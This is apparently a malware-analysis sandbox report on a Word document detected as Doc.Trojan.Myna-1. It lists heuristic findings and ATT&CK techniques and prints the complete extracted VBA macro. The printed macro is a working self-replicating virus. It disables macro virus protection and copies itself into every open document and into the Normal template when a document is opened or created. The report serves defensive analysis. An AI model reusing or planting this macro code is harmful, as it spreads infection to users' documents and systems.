MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon document opening. The ClamAV heuristic identifies the file as 'Doc.Trojan.Myna-1', indicating a known malicious document. The VBA code appears to inject itself into the document and potentially download further content, though the exact payload is not fully discernible from the provided script excerpt.
Heuristics 3
-
ClamAV: Doc.Trojan.Myna-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Myna-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3323 bytes |
SHA-256: 7df1cbd102fbba6a05be8907f45c83b68feb157026aaa15022b61302b5009e2b |
|||
|
Detection
ClamAV:
Doc.Trojan.Myna-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim stato As Boolean
Dim flagaltro As Boolean
Dim flagio As Boolean
Dim bry As Variant
On Error Resume Next
End Sub
Private Sub Document_New()
'
Dim aready As Boolean
Dim star As Long
Dim send As Long
Dim answer As String
Dim path$
Options.VirusProtection = False
answer = ""
star = 1
send = 1
path$ = Options.DefaultFilePath(wdUserTemplatesPath)
If Count <> 1 Then
Count = Count + 1
' Documents.Add
End If
If Documents.Count <> 0 Then
For i = 1 To Documents.Count
For Each xitem In Documents(i).VBProject.VBComponents
' If xitem.Name = "NewMacros" Then
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, star + send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
Next
End If
For Each xitem In NormalTemplate.VBProject.VBComponents
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
End Sub
Private Sub Document_Open()
Dim aready As Boolean
Dim star As Long
Dim send As Long
Dim answer As String
Dim path$
answer = "MYNAMEISVIRUS"
Options.VirusProtection = False
star = 1
send = 1
path$ = Options.DefaultFilePath(wdUserTemplatesPath)
If Count <> 1 Then
Count = Count + 1
' Documents.Add
End If
If Documents.Count <> 0 Then
For i = 1 To Documents.Count
For Each xitem In Documents(i).VBProject.VBComponents
' If xitem.Name = "NewMacros" Then
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, star + send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
Next
End If
For Each xitem In NormalTemplate.VBProject.VBComponents
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.